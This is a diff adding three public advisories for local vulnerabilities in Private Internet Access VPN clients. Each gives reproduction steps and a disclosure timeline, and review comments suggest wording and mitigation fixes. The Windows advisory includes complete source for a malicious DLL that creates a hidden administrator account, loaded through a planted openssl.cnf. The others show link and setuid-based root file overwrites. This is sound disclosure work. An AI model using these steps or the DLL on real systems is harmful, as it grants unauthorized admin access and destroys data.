Add advisories for Private Internet Access VPN desktop vulnerabilities
Showing 10 changed files with 996 additions and 3 deletions.
@@ -0,0 +1,111 @@ | ||
Title: PIA Beta macOS Arbitrary File Overwrite | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12571 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client | ||
v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to | ||
overwrite arbitrary files. | ||
|
||
When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created. | ||
If the file exists, it will be truncated and the contents completely overwritten. | ||
This file is removed on disconnect. An unprivileged user can create a hard or soft | ||
link to arbitrary files owned by any user on the system, including root. This creates | ||
a denial of service condition and possible data loss if leveraged by a malicious local user. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.1 | ||
Temporal: 7.1 | ||
|
||
|
||
Test Environment | ||
|
||
OS: macOS Mojave 10.14.1 | ||
Kernel: Darwin Kernel Version 18.2.0 | ||
PIA Version: v0.9.8 beta (build 02099) | ||
|
||
Steps to reproduce | ||
|
||
All steps are executed as a low privileged user. | ||
|
||
macbook:~ test2$ id | ||
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2) | ||
|
||
|
||
Step 1 - Create a root owned test file with permissions 600. | ||
|
||
|
||
bash-3.2# echo "this is a test" > /etc/test.file | ||
bash-3.2# chmod 600 /etc/test.file | ||
bash-3.2# ls -ld /etc/test.file | ||
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file | ||
|
||
|
||
Step 2 - Show that test2 does not have permission to write to /etc/test.file. | ||
|
||
|
||
macbook:~ test2$ echo test > /etc/test.file | ||
-bash: /etc/test.file: Permission denied | ||
|
||
|
||
Step 3 - Create a hard or soft link to a root owned file. | ||
|
||
|
||
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist | ||
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | ||
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file | ||
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist | ||
|
||
|
||
Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist. | ||
|
||
|
||
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | ||
ls: /tmp/pia-watcher.plist: No such file or directory | ||
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file | ||
|
||
|
||
Step 5 - As root display the contents of /etc/secret.file | ||
|
||
|
||
bash-3.2# cat /etc/test.file | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | ||
<plist version="1.0"> | ||
<dict> | ||
<key>Label</key> | ||
<string>com.privateinternetaccess.vpn.watcher</string> | ||
<key>ProgramArguments</key> | ||
<array> | ||
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string> | ||
</array> | ||
<key>EnvironmentVariables</key> | ||
<dict> | ||
<key>script_type</key> | ||
<string>watch-notify</string> | ||
</dict> | ||
<key>StandardErrorPath</key> | ||
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string> | ||
<key>WatchPaths</key> | ||
<array> | ||
<string>/Library/Preferences/SystemConfiguration</string> | ||
</array> | ||
</dict> | ||
</plist> | ||
|
||
|
||
Timeline: | ||
|
||
2018-12-27: Reported to vendor | ||
2018-12-27: Vendor acknowledged receipt of report | ||
2019-01-18: Vendor states fix will be available in v83 however this version was never released. | ||
The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | ||
2019-06-10: Public disclosure |
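Review bot: the Step 5 heading says to display /etc/secret.file, but the command under it reads /etc/test.file, the file created in Step 1; change the heading to /etc/test.file. Two smaller points: the 2019-01-18 timeline entry runs two statements together ("...available in v83 however this version was never released. The desktop client was re-written."), which reads better as "v83; that version was never released" with the rewrite and the upgrade advice on their own line, and the description could state the defensive takeaway explicitly, namely that a root-privileged component writing a fixed, predictable filename under the world-writable /tmp and following an existing link is the root cause, so readers know what the fixed client must avoid and what to look for (a root-owned process truncating a pre-existing /tmp/pia-watcher.plist).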
@@ -0,0 +1,116 @@ | ||
Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12572 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/ | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | ||
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local | ||
attacker to run arbitrary code with elevated privileges. | ||
|
||
On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from | ||
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts | ||
to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By | ||
default on Windows systems, authenticated users can create directories under c:\. | ||
A low privileged user can create an openssl.cnf configuration file to load a | ||
malicious OpenSSL engine library resulting in the arbitrary code execution as | ||
SYSTEM when the service starts. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.8 | ||
Temporal: 7.8 | ||
|
||
|
||
Test Environment | ||
|
||
OS: Windows 10 Pro 10.0.17763 | ||
PIA Version: 1.0.2 (build 02363) | ||
|
||
|
||
Steps to reproduce | ||
|
||
Note: All steps are executed using a low privileged account. | ||
|
||
|
||
1) Create the c:\etc\ssl directory | ||
|
||
mkdir c:\etc\ssl | ||
|
||
|
||
2) Create a malicious engine library named woot.dll to create an administrator | ||
account named woot when loaded. | ||
|
||
|
||
/* Cross Compile with | ||
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared | ||
*/ | ||
#include <windows.h> | ||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
system("cmd /c net user woot insertpasswordhere /add"); | ||
system("cmd /c net localgroup administrators woot /add"); | ||
break; | ||
case DLL_THREAD_ATTACH: | ||
// Do thread-specific initialization. | ||
break; | ||
case DLL_THREAD_DETACH: | ||
// Do thread-specific cleanup. | ||
break; | ||
case DLL_PROCESS_DETACH: | ||
// Perform any necessary cleanup. | ||
break; | ||
} | ||
return TRUE; // Successful DLL_PROCESS_ATTACH. | ||
} | ||
|
||
|
||
3) Copy the malicious woot.dll file into the c:\etc\ssl folder. | ||
|
||
copy woot.dll c:\etc\ssl | ||
|
||
|
||
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents. | ||
|
||
openssl_conf = openssl_init | ||
[openssl_init] | ||
engines = engine_section | ||
[engine_section] | ||
woot = woot_section | ||
[woot_section] | ||
engine_id = woot | ||
dynamic_path = c:\\etc\\ssl\\woot.dll | ||
init = 0 | ||
|
||
|
||
5) Reboot the system because a low privilege user does not have permission to | ||
restart the service. | ||
|
||
|
||
6) After the reboot has completed, login and open a command shell. At this point | ||
the "woot" administrator account will exist. | ||
|
||
|
||
net user woot | ||
|
||
|
||
Timeline: | ||
|
||
2019-02-16: Reported to vendor | ||
2019-02-16: Vendor confirmed vulnerability | ||
2019-06-04: Vendor released fix in v1.2.1 | ||
2019-06-10: Public disclosure |
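Review bot: the description paragraph is missing a space in "service(pia-service.exe)" and "resulting in the arbitrary code execution" should drop "the"; in Step 2 the compile comment invokes g++ on woot.c, and the DLL calls system() without an explicit #include <stdlib.h>, so add the include rather than relying on windows.h pulling it in. More important for readers on the defending side: the fixed version (1.2.1) appears only in the timeline; a short Mitigation line in the body saying to upgrade to 1.2.1+ and, until then, that an administrator can pre-create c:\etc\ssl with restrictive ACLs, and monitor for creation of c:\etc\ssl\openssl.cnf or for pia-service.exe loading a DLL from outside its install directory, would make the write-up actionable.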
@@ -0,0 +1,72 @@ | ||
Title: PIA Linux, macOS Arbitrary File Overwrite | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12573 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) | ||
VPN Client v82 for Linux and macOS could allow an authenticated, local | ||
attacker to overwrite arbitrary files. | ||
|
||
The PIA Linux and macOS openvpn_launcher binary is setuid root. This | ||
binary supports the --log option which accepts a path as an argument. | ||
The --log parameter is not sanitized which allows a local unprivileged | ||
to overwrite arbitrary files owned by any user on the system, including | ||
root. This creates a denial of service condition and possible data loss | ||
if leveraged by a malicious local user. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.1 | ||
Temporal: 7.1 | ||
|
||
|
||
Test Environment | ||
|
||
OS: Ubuntu 18.04.1 LTS | ||
Kernel: 4.15.0-29-generic | ||
PIA Version: v82 | ||
|
||
OS: macOS Mojave 10.14.1 | ||
Kernel: Darwin Kernel Version 18.2.0 | ||
PIA Version: v82 | ||
|
||
|
||
Steps to reproduce | ||
|
||
|
||
Step 1 - Create a root owned test file. For this PoC /etc/test.txt is used. | ||
|
||
# As root | ||
echo "this is a test" > /etc/test.txt | ||
chmod 600 /etc/test.txt | ||
|
||
|
||
Step 2 - Overwrite the file using the --log option using a non privileged user. | ||
|
||
# macOS | ||
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt | ||
|
||
# Linux | ||
/opt/pia/openvpn_launcher.64 --log /etc/test.txt | ||
|
||
|
||
Step 3 - Verify the file contents have been overwritten | ||
|
||
# As root | ||
cat /etc/test.txt | ||
|
||
|
||
Timeline: | ||
|
||
2018-12-23: Reported to vendor | ||
2018-12-23: Vendor acknowledged receipt of report | ||
2019-01-18: Vendor states fix will be available in v83 however this version was never released. | ||
The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | ||
2019-06-10: Public disclosure |
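Review bot: the second description paragraph drops a word, "allows a local unprivileged to overwrite" should read "a local unprivileged user", the Step 2 heading doubles "using" ("Overwrite the file using the --log option using a non privileged user"), and the Step 3 heading lacks its closing period. The timeline is also the only place that tells readers the remedy (upgrade to v1.2.1+ of the rewritten client); stating it in the body and naming the underlying defect, a setuid-root binary opening a caller-supplied --log path with root privileges instead of dropping privileges or confining the path to its own log directory, would help defenders and downstream packagers.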